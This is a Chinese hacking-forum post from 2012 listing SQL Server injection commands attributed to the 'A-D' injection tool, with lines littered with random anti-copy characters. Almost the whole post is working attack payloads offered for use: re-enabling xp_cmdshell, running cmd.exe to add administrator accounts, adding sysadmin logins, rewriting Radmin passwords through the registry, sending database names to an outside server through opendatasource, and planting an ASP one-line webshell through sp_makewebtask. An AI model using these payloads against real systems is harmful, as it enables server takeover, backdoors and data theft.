找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1907|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令/ u0 B1 I: @# B3 E4 u3 V
//看看是什么权限的
0 ?3 t0 z+ P; zand 1=(Select IS_MEMBER('db_owner')), P- ?2 |1 c3 @/ M! ]9 D1 ^
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--5 N& ~/ e4 N' D3 }# w* D
, s( ?: G  r& u5 q5 |, G4 ?) q. K
//检测是否有读取某数据库的权限( Z! k& O# {, e0 u9 K
and 1= (Select HAS_DBACCESS('master'))2 }' V7 e0 f0 c% k
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --% @$ i2 E3 k) J) g  ?6 l% l$ c
( K4 E0 F- u# u, {. g2 ?
, ~( y7 W6 ^8 x/ y/ x
数字类型" Z1 a, W8 F" `
and char(124)%2Buser%2Bchar(124)=0( M8 o5 n7 \) m+ Q
! m9 S  }8 _  ^) U" v
字符类型  B3 c: q( x4 F/ O5 O
' and char(124)%2Buser%2Bchar(124)=0 and ''='
8 `# ~7 ?+ ^. e6 @5 H) y; A. I2 g- j# {5 P: N$ u9 m
搜索类型, U( L: x3 b! ]; r* A9 u( q
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
0 c5 [4 z$ E4 {' {2 U3 B) M% Q1 L8 K3 W9 ~2 [; s# b
爆用户名9 ?7 U8 V# h' f9 u6 v0 C
and user>0
2 q4 y; o- x/ ^( ?0 h3 S4 n' and user>0 and ''='
. a1 m( T! [& d: Y9 D9 Z5 N$ N, I$ F
检测是否为SA权限$ U7 ^8 O2 d- f7 D/ i" \& S3 `; ]
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
* a  c7 B3 [" Q! Y& o* N4 {: tAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --0 A" o% V; r) Q& P

  P% H7 }5 x8 T2 C; ?( g8 f检测是不是MSSQL数据库
3 X+ W( R+ [; t" @and exists (select * from sysobjects);-- ) X3 P. H) Q% d0 Y

! a4 _$ T7 ]. \- g2 p& w+ H( m检测是否支持多行0 R$ J$ E% j3 N2 M4 T, b' q1 A
;declare @d int;-- 7 x+ U- m3 u+ p
  ]+ P: O. u, Y" j9 O9 G1 \; ]2 X
恢复 xp_cmdshell
% G5 [, P* j7 ?# {6 c4 c;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
, X$ w# L' H% Z- m2 _% e
1 J# }# t3 n8 _7 ~7 J+ `$ z, ]5 W* o. b% C, ^. f0 ~, K1 P; o6 v8 @
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
; S( G6 O0 A% R' e1 _) V1 l$ G4 |$ c# Y8 m; u
//-----------------------8 L; x$ y: D# C& X
//      执行命令
* R7 ^7 e6 V, p* O/ G& e//-----------------------+ x% i4 k0 }9 I, q, e% c8 Y5 G9 ~- x$ ]
首先开启沙盘模式:! p. d1 ?5 K. }6 q: i0 t8 L
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
% q* _9 ^: C9 e  ?1 Q' F/ R" j# S! F* c+ A1 E
然后利用jet.oledb执行系统命令. U. }$ \0 b  C( ]: x3 [
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')7 k9 ^( q, d4 ]0 {6 w, q

: ~- e/ v& _( s+ k执行命令" B3 ]# p/ {% i
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--  s! E0 S/ x% s. A0 o# t8 u
9 }, x, n: v5 ^* c; e, }0 ~8 e( n
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
" z% |+ T, R4 y3 @" R3 F5 E
  W0 P# Y! Z6 U6 L: g判断xp_cmdshell扩展存储过程是否存在:
, p6 h" @( M( [& A6 c+ u' `* _! Nhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell'): m: t, |0 A' ], P
' B$ z7 ~# M( h6 R% `; ~# s9 H
写注册表
. ~  M3 P3 \9 ~( }exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',19 \  U! V  q- }- q& z# ~

# k% ~9 y5 z. S; N' aREG_SZ
! Z( p7 v2 x0 Y1 U/ v1 \) G2 `" m# D) T% l, R# E7 C
读注册表
$ w; x+ \6 T- V7 ^5 D, mexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'! x) G7 Y4 H1 E8 b  [. ]2 o

+ L" u; o8 d! k读取目录内容& R- J; G; k% Q' O' b, S* m
exec master..xp_dirtree 'c:\winnt\system32\',1,1
% A1 ^& B& s/ ~# T' p# k; p* K" H' K8 S/ o

- h$ {4 O, j% J- n9 b0 ]" N* M数据库备份! X9 K2 p# |2 h
backup database pubs to disk = 'c:\123.bak'# `& Q" Y) I) h; r; L' o

& x8 d  V: z8 \: f//爆出长度
2 Q0 n1 g' z+ Q6 h0 d% JAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
: Q! r: f) C5 n. n# S
% h+ x8 [$ R1 G( k$ v% P5 w  b+ H. l$ C  V

6 z# ?3 Q) i) J, d7 z+ Q" t更改sa口令方法:用sql综合利用工具连接后,执行命令:# r0 @# [7 F4 ^0 `7 a2 M
exec sp_password NULL,'新密码','sa'0 j3 F/ H, j, [, q2 j6 s6 ^2 O$ L
. g. T( r6 k3 Y
添加和删除一个SA权限的用户test:
0 A  D  l+ I, r$ oexec master.dbo.sp_addlogin test,ptlove! {% ?6 V( j# x! k9 S0 t
exec master.dbo.sp_addsrvrolemember test,sysadmin" J4 `  k) q6 @! }$ O! t) r! m- Q

$ c$ d: @/ _' x2 T. N删除扩展存储过过程xp_cmdshell的语句:
: z& ]  ]+ \& Jexec sp_dropextendedproc 'xp_cmdshell'( h$ ]% d  e/ _& X% V8 z6 y. F
6 Z- F% q% N. e9 a9 [# V- {% m- K7 A
添加扩展存储过过程
. P: q! y5 t6 V; n  ZEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
  s3 a8 W. A, I& z4 dGRANT exec On xp_proxiedadata TO public
/ c- g5 ?3 V4 B  S" y( x4 H( Q4 n- |% ?. x! g( G

" L( @! @4 P4 m$ ?- j1 o# [! s( `  Q停掉或激活某个服务。
7 k, e/ ~+ B) o
7 i/ C& k# S) p" zexec master..xp_servicecontrol 'stop','schedule'
0 [$ @4 r' b$ C6 A( C+ `exec master..xp_servicecontrol 'start','schedule'
; m+ g6 a( W1 ?7 U. D& T. y) k3 R4 H5 l+ H
dbo.xp_subdirs
) d# o2 E9 [/ `! I6 A+ _
' Y4 M' x; E4 o2 G) w只列某个目录下的子目录。
* s) r  j8 r" Z/ b8 B0 nxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'& Z4 r5 z5 I% ?8 W/ A0 {

9 A7 b7 ]0 \. B+ K, {$ pdbo.xp_makecab
1 K6 R' T! e2 b0 `7 l/ b" ~- T# K! S% `8 c7 r  b( ?  x
将目标多个档案压缩到某个目标档案之内。( ~7 j$ W; {3 Z- q
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。$ R8 `/ S& u6 G! U6 s8 D( j4 j

% b/ \3 f5 c, n) _! {& ddbo.xp_makecab' N7 Y  X4 r8 Y# Q
'c:\test.cab','mszip',1,  J3 j  U1 \3 z6 S9 t
'C:\Inetpub\wwwroot\SQLInject\login.asp',
7 N+ n8 U" f! \'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'+ S7 A4 B, B0 ~

) s' _/ {+ W, F1 q' U5 L7 ^xp_terminate_process. H- J6 [: \- C, v# S0 u, ^
6 i) Y2 X; n9 ?
停掉某个执行中的程序,但赋予的参数是 Process ID。
/ a( _2 H7 R* \: a& E& q/ w1 ?利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID/ Q" Y! P2 R% @/ \' W+ ]! f
( x% e/ u2 @" j, E# T
xp_terminate_process 2484
7 k  b6 y2 N' ?, q/ l
; \3 |7 O" I! Y0 P5 ~4 @xp_unpackcab
! N' m0 u7 \, T+ k, h" c0 C2 O+ V* y1 Q( F5 X! Q
解开压缩档。% S5 u1 s2 B) o4 H4 ^
) A& v3 K+ Q9 F. r3 q1 B# V% {* n
xp_unpackcab 'c:\test.cab','c:\temp',1
0 r( s( k, Q/ o2 x4 g
2 T, o# ?" K9 A5 ]" J5 r- H# @
) f1 j5 J% J) J' ~8 F某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
) i# r: o' o! k; s6 z
5 b( P& p* |1 p- ecreate database lcx;
8 Q+ ?3 J3 ~9 M5 b6 vCreate TABLE ku(name nvarchar(256) null);  S  i, [- e$ [; A) |4 W
Create TABLE biao(id int NULL,name nvarchar(256) null);: h: @+ g8 u9 S

/ {% k  B' o; U5 \- ~" t//得到数据库名- W1 Z6 _! t+ S( B4 I
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases2 A* A# V# N" I5 W3 m8 |6 X

7 s6 [' q7 Z0 H3 ~+ G3 l+ O3 A
! s' u( W  w6 ~" P6 S//在Master中创建表,看看权限怎样' y. o' |0 L( I
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--, x& s  ]0 Q, G1 G7 D4 x! s

; O, d! t' |' B) Y5 f( M5 e用 sp_makewebtask直接在web目录里写入一句话马:/ P5 v" F- w7 ^7 t( g- \
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--1 }! L5 E9 D; Q9 k- w! H

( N* x: h5 l: K* K( J9 r1 N: b//更新表内容
7 v, ~5 t& t* n: iUpdate films SET kind = 'Dramatic' Where id = 123
# B$ u  X5 ?. L' A7 h1 V
- o$ E7 s; b, D, c4 H. I. L! M//删除内容
( L0 o. d2 |; l' y  U8 c9 @delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表